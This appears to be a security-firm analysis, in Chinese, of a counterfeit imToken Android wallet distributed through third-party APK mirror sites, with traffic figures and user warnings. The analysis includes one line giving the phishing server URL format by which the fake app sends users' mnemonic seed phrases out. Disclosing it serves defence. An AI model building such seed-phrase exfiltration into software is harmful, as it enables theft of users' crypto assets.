在 Web3 世界中,錢包是進入世界的通行者,但如果這張通行證是假的,用戶承受的後果會十分嚴重。本文將介紹 Web3 假錢包的調查分析。
(前情提要:注意!Metamask小狐狸、imToken錢包釣魚攻擊激增,速記3個防備方案)
(背景補充:什麼是「MPC錢包」,真能解決加密資產安全問題?)
背景
基於區塊鏈技術的 Web3 正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但 Web3 與 Web2 是兩個截然不同的世界。Web3 世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處 Web3 世界中,錢包則是進入 Web3 世界的入口以及通行證。
當你通過錢包在 Web3 世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包 「登入」;這與我們傳統意義上的 「登入」 不同,在 Web2 世界中,每個應用之間的帳戶不全是互通的。但在 Web3 的世界中,所有應用都是統一使用錢包去進行 「登入」,我們可以看到 「登入」 錢包時顯示的不是 「Login with Wallet」,取而代之的是 「Connect Wallet」。而錢包是你在 Web3 世界中的唯一通行證。
俗話說高樓之下必有陰影,在如此火熱的 Web3 世界裡,錢包作為入口級應用,自然也被黑灰產業鏈盯上。
在 Android 環境下,由於很多手機不支援 Google Play 或者因為網路問題,很多人會從其他途徑下載 Google Play 的應用,比如:apkcombo、apkpure 等第三方下載站,這些站點往往標榜自己 App 是從 Google Play 映像下載的,但是其真實安全性如何呢?
網站分析
鑑於下載途徑眾多,我們今天以 apkcombo 為例看看,apkcombo 是一個第三方應用市場,它提供的應用據官方說大部分來源於其他正規應用商店,但事實是否真如官方所說呢?
我們先看下 apkcombo 的流量有多大:
據資料統計站點 similarweb 統計,apkcombo 站點:
全球排名:1,809
國家排名:7,370
品類排名:168
我們可以看到它的影響力和流量都非常大。
它預設提供了一款 chrome APK 下載外掛,我們發現這款外掛的使用者數達到了 100,000 +:
那麼回到我們關注的 Web3 領域中錢包方向,使用者如果從這裡下載的錢包應用安全性如何?
我們拿知名的 imToken 錢包為例,其 Google Play 的正規下載途徑為:
https://play.google.com/store/apps/details?id=im.token.app
由於很多手機不支援 Google Play 或者因為網路問題,很多人會從這裡下載 Google Play 的應用。
而 apkcombo 映象站的下載路徑為:
https://apkcombo.com/downloader/#package=im.token.app
上圖我們可以發現,apkcombo 提供的版本為 24.9.11,經由 imToken 確認後,這是一個並不存在的版本!證實這是目前市面上假 imToken 錢包最多的一個版本。
在編寫本文時 imToken 錢包的最新版本為 2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設定的。
如下圖,我們在 apkcombo 上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的 Google Play 的下載量資訊,安全起見,我們覺得有必要披露這個惡意 App 的來源,防止更多的人下載到此款假錢包。
同時我們發現類似的下載站還有如:uptodown
下載地址:https://imtoken.br.uptodown.com/android
我們發現 uptodown 任意註冊即可釋出 App,這導致釣魚的成本變得極低:
錢包分析
在之前我們已經分析過不少假錢包的案例,如:2021-11-24 我們披露:《慢霧:假錢包 App 已致上萬人被盜,損失高達十三億美元 》,所以在此不再贅述。
我們僅對 apkcombo 提供版本為 24.9.11 這款假錢包進行分析,在開始介面建立錢包或匯入錢包助記詞時,虛假錢包會將助記詞等資訊傳送到釣魚網站的服務端去,如下圖:
根據逆向 APK 程式碼和實際分析流量包發現,助記詞傳送方式:
https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>
看下圖,最早的 「api.funnel.rocks」 證書出現在 2022-06-03,也就是攻擊開始的大概時間:
俗話說一圖勝千言,最後我們畫一個流程圖:
總結
目前這種騙局活動不僅活躍,甚至有擴大範圍的趨勢,每天都有新的受害者受騙。使用者作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認準官方下載渠道並從多方進行驗證;如果你的錢包從上述映像站下載,請第一時間轉移資產並解除安裝該軟體,必要時可通過官方驗證通道核實。
同時,如需使用錢包,請務必認準以下主流錢包 App 官方網址:
1/imToken 錢包:
2/TokenPocket 錢包:
3/TronLink 錢包:
4 / 比特派錢包:
5/MetaMask 錢包:
6/Trust Wallet:
請持續關注慢霧安全團隊,更多 Web3 安全風險分析與告警正在路上。
致謝:感謝在溯源過程中 imToken 官方提供的驗證支援。
由於保密性和隱私性,本文只是冰山一角。慢霧在此建議,使用者需加強對安全知識的瞭解,進一步強化甄別網路釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》
📍相關報導📍
加密貨幣「億萬富翁」都投資什麼?來看Arthur Hayes、孫宇晨..的錢包
